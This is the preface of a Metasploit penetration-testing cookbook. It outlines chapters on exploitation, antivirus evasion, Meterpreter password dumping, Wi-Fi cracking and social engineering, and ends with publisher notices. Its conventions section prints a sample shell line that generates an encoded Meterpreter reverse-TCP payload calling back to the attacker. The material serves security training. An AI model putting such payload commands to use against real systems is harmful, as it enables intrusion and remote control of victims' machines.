Welcome to Metasploit Penetration Testing Cookbook, Second Edition. This book covers various recipes of performing penetration testing over different platforms (including a Wireless network and VoIP) using BackTrack 5 R3. The book starts with the basics of gathering information about your target and gradually covers advanced topics, such as building your own framework scripts and modules.
The book goes deep into operating-systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. In the post-exploitation phase, it covers Meterpreter, antivirus bypassing, Ruby wonders, exploit building, porting exploits to framework, and pentesting while dealing with VoIP, Wireless, and so on. This book will help readers in thinking from a hacker's perspective, to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level. It covers advanced Meterpreter usage for token impersonation and WinAPI manipulation, ESPIA, Incognito attack, injecting the VNC server remotely, exploiting vulnerable PHP applications, and much more.
It will help in setting up a complete penetration testing environment using Metasploit and virtual machines, building and analyzing Meterpreter scripts in Ruby, pentesting VoIP, WLAN from start to end including information gathering, vulnerability assessment, and exploitation and privilege escalation phases. The reader will become familiar with penetration testing based on client-side exploitation techniques with detailed analysis of vulnerabilities and codes.
Chapter 1, Metasploit Quick Tips for Security Professionals, includes quick recipes, such as Configuring Metasploit on Windows, Configuring Metasploit on Ubuntu, Installing Metasploit with BackTrack 5 R3, Setting up the penetration testing using VMware, Setting up Metasploit on a virtual machine with SSH connectivity, Installing and configuring PostgreSQL in BackTrack 5 R3, Using the database to store the penetration testing results, and Working with BBQSQL.
Chapter 2, Information Gathering and Scanning, discusses port scanning in a distributed environment, in addition to the previous edition. Several other scanning techniques, including SMB, SSH, FTP, and SNMP Sweeping are also explained in this chapter.
Chapter 3, Operating-System-based Vulnerability Assessment, includes OS such as XP, Ubuntu, and the very fascinating Windows 8, with quick tips for exploit usage. Along with these, it discusses Win DLL injection flaws.
Chapter 4, Client-side Exploitation and Antivirus Bypass, elaborates on the latest vulnerabilities regarding Internet Explorer, Adobe Flash Player, and Microsoft Word. Msfencoded payloads are no longer hidden from AVs, so it is being followed by the syringe utility that promises a lesser detection ratio than msfencoders.
Chapter 5, Working with Modules for Penetration Testing, covers all the basics regarding working with modules for penetration testing, such as Working with scanner auxiliary modules, Working with auxiliary admin modules, SQL injection and DoS attack modules, Post-exploitation modules, Understanding the basics of module building, Analyzing an existing module, and Building your own post-exploitation.
Chapter 6, Exploring Exploits, enables the readers to transform an exploit to a module, as well as write its own fuzzer in the end.
Chapter 7, VoIP Penetration Testing, discusses VoIP penetration testing in detail, along with VoIP topologies. It elaborates the process in a step-by-step manner ending in its exploitation using VLAN hopping, VoIP MAC Spoofing, Impersonation attack, and DoS attack.
Chapter 8, Wireless Network Penetration Testing, includes Setting up and running Fern WiFi Cracker, Sniffing interfaces with tcpdump, Cracking WEP and WPA with Fern WiFi Cracker, Session hijacking via a MAC address, Locating a target's geolocation, war driving, evil twin attack, and Karmetasploit.
Chapter 9, Social-Engineer Toolkit, explains about social engineering, which is an act of manipulating people to perform actions that they don't intend to do. A cyber-based socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security.
Chapter 10, Working with Meterpreter, covers all of the commands related to Meterpreter. It also leverages Meterpreter in viewing traffic on remote machines, followed by usernames and passwords dumping. Token impersonation and WinAPI manipulation, ESPIA usage, Incognito attack, injecting the VNC server remotely, and exploiting vulnerable PHP application are key additions to this chapter.
Appendix, Pentesting in the Cloud, explains that cloud computing is like distributed computing over a network and that it possesses the ability to run a program on many connected machines simultaneously. It also explains pentesting in a cloud and also how to pentest in a cloud with hackerserver.com.
To perform the various recipes mentioned in this book, you will need the following:
Attacker machine: BackTrack 5 R3
Victim machine: Windows XP (SP2/SP3), Windows 7, Windows 8, or Ubuntu
Software: Almost all the software mentioned in the book can be found in BackTrack 5 R3, just in case if you are unable to get the required software, the download link is mentioned in the book.
This book targets both professional penetration testers, as well as new users of Metasploit who wish to gain expertise on the framework with an additional skill of pentesting, not limited to a particular OS. The book requires basic knowledge of scanning, exploitation, and Ruby language.
In this book, you will find a number of styles of text that distinguish between different kinds of information. Here are some examples of these styles, and an explanation of their meaning.
Code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles are shown as follows: "The Nslookup command has revealed further information about the target, such as its IP address, server IP, and so on."
A block of code is set as follows:
export interface=eth0export ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')export port=$(shuf -i 2000-65000 -n 1)
echo -e "\e[01;32m[>]\e[00m Generating payload..."payload=$(msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=$port LHOST=$ourIP R | msfencode -a x86 –e x86/alpha_mixed -t raw BufferRegister=EAX)Any command-line input or output is written as follows:
chmod +x metasploit-latest-linux-x64-installer.run You will get the text of the license in a bunch of pages, then: Do you accept this license? [y/n]: y Select a folder [/opt/metasploit]: Install Metasploit as a service? [Y/n]: Service script name: [metasploit]: SSL Port [3790]:
New terms and important words are shown in bold. Words that you see on the screen, in menus or dialog boxes, for example, appear in the text like this: "To launch Metasploit from the Applications menu, go to Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework."
Feedback from our readers is always welcome. Let us know what you think about this book—what you liked or may have disliked. Reader feedback is important for us to develop titles that you really get the most out of.
To send us general feedback, simply send an e-mail to <[email protected]>, and mention the book title via the subject of your message.
If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide on www.packtpub.com/authors.
Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.
You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.
Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books—maybe a mistake in the text or the code—we would be grateful if you would report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the errata submission form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded on our website, or added to any list of existing errata, under the Errata section of that title. Any existing errata can be viewed by selecting your title from http://www.packtpub.com/support.
Piracy of copyright material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works, in any form, on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.
Please contact us at <[email protected]> with a link to the suspected pirated material.
We appreciate your help in protecting our authors and our ability to bring you valuable content.
You can contact us at <[email protected]> if you are having a problem with any aspect of the book, and we will do our best to address it.